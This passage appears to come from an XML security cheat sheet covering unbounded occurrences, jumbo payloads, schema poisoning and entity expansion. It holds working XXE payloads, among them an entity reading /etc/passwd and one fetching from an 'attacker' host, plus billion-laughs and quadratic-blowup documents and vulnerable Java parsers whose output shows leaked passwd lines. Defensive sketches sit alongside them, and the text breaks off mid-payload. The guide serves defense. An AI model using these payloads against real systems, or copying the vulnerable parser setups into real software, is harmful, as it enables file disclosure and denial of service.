==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can leave an application unable to cope with an extreme number of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
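&lt;br /&gt;
Where the schema cannot be changed, a cap could also be enforced while parsing. The following Java sketch is one possible approach, not a prescribed one: a SAX handler with hypothetical names counts a given element and aborts once a limit is exceeded. It uses the default parser configuration for brevity, which is an assumption that would need hardening against the entity attacks described elsewhere in this document:&lt;br /&gt;

```java
import java.io.StringReader;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

final class OccurrenceLimit extends DefaultHandler {
    private final String elementName;
    private final int maxOccurrences;
    private int seen;

    OccurrenceLimit(String elementName, int maxOccurrences) {
        this.elementName = elementName;
        this.maxOccurrences = maxOccurrences;
    }

    @Override
    public void startElement(String uri, String localName, String qName,
                             Attributes attributes) throws SAXException {
        if (qName.equals(elementName)) {
            seen++;
            // Stop parsing as soon as the cap is exceeded.
            if (seen > maxOccurrences) {
                throw new SAXException("more than " + maxOccurrences
                        + " " + elementName + " elements");
            }
        }
    }

    // True when the document parses and stays within the limit;
    // malformed documents are also reported as false.
    static boolean withinLimit(String xml, String elementName, int maxOccurrences) {
        try {
            SAXParserFactory.newInstance().newSAXParser().parse(
                    new InputSource(new StringReader(xml)),
                    new OccurrenceLimit(elementName, maxOccurrences));
            return true;
        } catch (Exception e) {
            return false;
        }
    }
}
```

Because the handler aborts at the first element over the limit, the remainder of an oversized document is never processed.&lt;br /&gt;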
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
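&lt;br /&gt;
One way an application might bound the cost of such documents is to cap the number of bytes it reads before handing them to a parser. This is a sketch under that assumption; the class name, method name, and limit are hypothetical, and the cap does nothing against the small payloads described in the next section:&lt;br /&gt;

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;

final class JumboGuard {
    // Reads the whole stream, failing once more than maxBytes have arrived.
    static byte[] readAtMost(InputStream in, int maxBytes) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buffer = new byte[8192];
        int total = 0;
        int read;
        try {
            while ((read = in.read(buffer)) != -1) {
                total += read;
                if (total > maxBytes) {
                    throw new IllegalStateException(
                            "payload larger than " + maxBytes + " bytes");
                }
                out.write(buffer, 0, read);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return out.toByteArray();
    }

    public static void main(String[] args) {
        // Hypothetical limit of one million bytes for documents on standard input.
        byte[] document = readAtMost(System.in, 1_000_000);
        System.out.println(document.length + " bytes accepted");
    }
}
```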
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server remotely. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
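&lt;br /&gt;
A deployment check for this condition could look like the following Java sketch. The class and method names are hypothetical; the first method interprets the nine permission characters from a listing like the one above, and the second queries a file directly, which assumes a POSIX file system:&lt;br /&gt;

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;

final class SchemaPermissions {
    // Takes the nine permission characters of a listing, without the file type.
    static boolean modeIsWorldWritable(String mode) {
        return PosixFilePermissions.fromString(mode)
                .contains(PosixFilePermission.OTHERS_WRITE);
    }

    // Same check against a real file; unsupported on non-POSIX file systems.
    static boolean fileIsWorldWritable(Path file) throws IOException {
        return Files.getPosixFilePermissions(file)
                .contains(PosixFilePermission.OTHERS_WRITE);
    }

    public static void main(String[] args) {
        System.out.println(modeIsWorldWritable("rw-rw-rw-"));  // true
        System.out.println(modeIsWorldWritable("rw-r--r--"));  // false
    }
}
```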
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff and modify the traffic before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capability of referencing local or remote files, it is possible to affect confidentiality. It is also possible to affect the availability of resources if no proper restrictions have been set on entity expansion. Consider the following example of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
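&lt;br /&gt;
For contrast, the sketch below shows one commonly used way to make a DOM parser refuse such documents. It is not a complete hardening guide: it assumes the Xerces-based parser bundled with the JDK, which recognizes the &amp;lt;tt&amp;gt;disallow-doctype-decl&amp;lt;/tt&amp;gt; feature, and the class and method names are hypothetical:&lt;br /&gt;

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

final class HardenedDomParser {
    // Parses XML text with DOCTYPE declarations rejected outright.
    static Document parse(String xml)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Assumption: the underlying parser supports this Xerces feature URI.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    // True when the document parses; false when the parser rejects it.
    static boolean accepts(String xml) {
        try {
            parse(xml);
            return true;
        } catch (SAXException e) {
            return false;
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) throws IOException {
        // args[0]: path of the XML file to check, for example contacts.xml
        String xml = new String(Files.readAllBytes(Paths.get(args[0])), StandardCharsets.UTF_8);
        System.out.println(accepts(xml) ? "parsed" : "rejected");
    }
}
```

Run against the sample &amp;lt;tt&amp;gt;contacts.xml&amp;lt;/tt&amp;gt;, which carries a DOCTYPE, this parser should reject the document instead of expanding the entity.&lt;br /&gt;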
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   // try-with-resources closes the file even if parsing fails&lt;br /&gt;
   try (FileInputStream in = new FileInputStream(&amp;quot;contacts.xml&amp;quot;)) {&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    // The first argument is the system ID of the document being read&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, in);&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     xmlfer.next();&lt;br /&gt;
     // Print every event that carries text, including the expanded entity&lt;br /&gt;
     if (xmlfer.hasText()) {&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    xmlfer.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
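&lt;br /&gt;
The amplification can be estimated with simple arithmetic. This Java sketch uses hypothetical names and ignores the surrounding markup, so the figures are approximate; it compares the characters sent (one entity body plus the references, each 3 characters long for an entity named A) with the characters held after expansion:&lt;br /&gt;

```java
final class QuadraticBlowup {
    // Characters the attacker sends: the entity body plus all references to it.
    static long payloadChars(long entityLength, long references, long referenceLength) {
        return entityLength + references * referenceLength;
    }

    // Characters the parser holds once every reference has been expanded.
    static long expandedChars(long entityLength, long references) {
        return entityLength * references;
    }

    public static void main(String[] args) {
        long sent = payloadChars(100_000L, 100_000L, 3L);
        long expanded = expandedChars(100_000L, 100_000L);
        System.out.println("sent: " + sent);               // sent: 400000
        System.out.println("expanded: " + expanded);       // expanded: 10000000000
        System.out.println("ratio: " + expanded / sent);   // ratio: 25000
    }
}
```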
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
